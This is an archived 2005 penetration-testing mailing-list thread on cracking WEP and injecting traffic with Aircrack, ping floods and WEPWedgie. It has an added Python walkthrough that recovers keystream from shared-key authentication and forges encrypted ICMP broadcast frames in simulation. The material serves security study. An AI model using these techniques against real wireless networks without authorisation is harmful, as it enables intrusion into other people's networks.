Penetration Testing mailing list archives
Re: Wireless Pentest Question
From: Brandon Kovacs <liljoker771 () gmail com>
Date: Mon, 7 Feb 2005 12:00:42 -0500
Yes...

IP Address of gateway: Use Ettercap
Create Traffic: ICMP Ping Flood Tool
WEP Key being used: Aircrack or Snort

Hope that helps. Collecting enough WEP IVs in aircrack can take some time; you will need approx. 200k-500k, depending on the amount of traffic on the network. That is where the ICMP ping flood tool comes in. Aircrack will crack the WEP key in a few seconds; if you tell it how long the WEP key is, it will do it faster, otherwise you will need to wait a few more seconds.

-Brandon Kovacs

On Mon, 07 Feb 2005 07:06:22 -0500, Joshua Wright <jwright () hasborg com> wrote:
> Arvind,
>
> Arvind Sood wrote:
>> The problem relates to creating traffic on a wireless network in case you don't find a lot of traffic for a good capture. Is there any way you can create traffic on a WEP network without knowing
>> - the IP Address (address range) the Access Point and wireless clients are using
>> - the WEP key being used (makes sense - that is why you are running a WEP crack)
>
> Besides aireplay (not sure why you are getting a SEGFAULT, it worked OK for me - maybe check the Aircrack documentation?), you could use WEPWedgie. This tool was written by Anton Rager a few years ago, and allows you to inject packets into the network after determining PRGA from the WEP challenge/response mechanism.
>
> http://www.sf.net/projects/wepwedgie/
>
> The current version relies on the Airjack drivers for operation, meaning you'll have to run it on a Linux 2.4 kernel system. I wrote a small patch to add an option to send ICMP echo requests to the broadcast address (since you might not know any internal addresses), which is available at http://home.jwu.edu/jwright/code/ww-broadcasticmp.diff. Unfortunately, Airjack has some timing issues which make it somewhat ineffective for injecting large quantities of packets, but this will get you started.
>
> While at Shmoocon (you guys rock!) I started re-writing WEPWedgie to port it to a more reliable packet injection framework (and code cleanup) for another project; I'll make that available when I get it finished.
>
> Good luck,
>
> -Josh
>
> --
> -Joshua Wright
> jwright () hasborg com
> http://home.jwu.edu/jwright/
>
> pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
> fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73
>
> Today I stumbled across the world's largest hotspot. The SSID is "linksys".
--
-Brandon
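The technique Josh describes above, determining the PRGA from the shared-key authentication exchange and then injecting an ICMP echo to the broadcast address without knowing the WEP key or any internal address, is worked through below as an added example. This is illustrative Python written for this archive page, not WEPWedgie's code, Josh's patch, or anything posted in the thread; the 40-bit key, the IV, the 128-byte challenge and the packet addresses are all constructed here. The WEP framing it models (per-packet RC4 key = IV || shared key, CRC-32 ICV appended before encryption, IV sent in the clear) is the real protocol; the 802.11 MAC headers and the driver-level injection that Airjack provides are left out.

```python
"""WEP keystream recovery from shared-key auth and forging an ICMP echo.

Example code for the archive page; not from WEPWedgie or the thread.
"""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), XORed over data. WEP uses it unmodified."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32, transmitted little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as a station would send it: IV || key-id || RC4(pt || ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes):
    """What the AP does on receipt; returns (iv, data) or None on ICV failure."""
    iv, ct = body[:3], body[4:]
    pt = rc4(iv + key, ct)
    data, tag = pt[:-4], pt[-4:]
    return (iv, data) if icv(data) == tag else None


def recover_keystream(body: bytes, known_plaintext: bytes):
    """Attacker side: keystream = ciphertext XOR (known plaintext || ICV).

    The shared-key auth challenge is sent in the clear and echoed encrypted,
    so both sides of the XOR are on the air. No key needed.
    """
    iv, ct = body[:3], body[4:]
    pt = known_plaintext + icv(known_plaintext)
    return iv, bytes(c ^ p for c, p in zip(ct, pt))


def forge_body(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Re-use the recovered keystream under the same IV for a chosen packet.

    The packet (plus 4-byte ICV) cannot exceed the recovered keystream length.
    """
    pt = plaintext + icv(plaintext)
    if len(pt) > len(keystream):
        raise ValueError("packet longer than recovered keystream")
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(pt, keystream))


def ip_checksum(data: bytes) -> int:
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def icmp_echo_to_broadcast(src: bytes = b"\x0a\x00\x00\x01", payload: bytes = b"A" * 8) -> bytes:
    """LLC/SNAP + IPv4 + ICMP echo request to 255.255.255.255 (constructed).

    Destination is the limited broadcast so no internal address is needed;
    the source (10.0.0.1 here) is arbitrary for the example.
    """
    llc = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"
    icmp = struct.pack("!BBHHH", 8, 0, 0, 1, 1) + payload
    icmp = icmp[:2] + struct.pack("!H", ip_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     src, b"\xff\xff\xff\xff")
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    return llc + ip + icmp


def demo():
    """Full exchange; returns (AP accepted forged frame?, keystream bytes recovered)."""
    shared_key = b"\x01\x02\x03\x04\x05"        # 40-bit WEP key, unknown to attacker
    iv = b"\x11\x22\x33"                        # IV the client picks for its auth response
    challenge = bytes(range(128))               # 128-byte challenge, sent by AP in the clear
    response = wep_encrypt(shared_key, iv, challenge)   # client's reply, observed on the air
    iv_seen, keystream = recover_keystream(response, challenge)
    forged = forge_body(iv_seen, keystream, icmp_echo_to_broadcast())
    accepted = wep_decrypt(shared_key, forged)
    return accepted is not None and accepted[1] == icmp_echo_to_broadcast(), len(keystream)


if __name__ == "__main__":
    print(demo())
```

The 128-byte challenge yields 132 bytes of keystream, which is the ceiling on anything injected under that IV; a small ICMP echo fits easily, and because the ICV is a plain CRC-32 under a stream cipher the AP cannot tell the forged frame from a genuine one. Each broadcast echo then draws replies encrypted under fresh IVs, which is the IV-collection traffic Brandon's ping-flood step is after.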
Current thread:
- Wireless Pentest Question Arvind Sood (Feb 05)
- RE: Wireless Pentest Question Harshul Nayak (Feb 07)
- Re: Wireless Pentest Question Erik Winkler (Feb 07)
- Re: Wireless Pentest Question Joshua Wright (Feb 07)
- Re: Wireless Pentest Question Brandon Kovacs (Feb 07)
- Re: Wireless Pentest Question Berdt van der Lingen (Feb 08)
- RE: Wireless Pentest Question Harshul Nayak (Feb 07)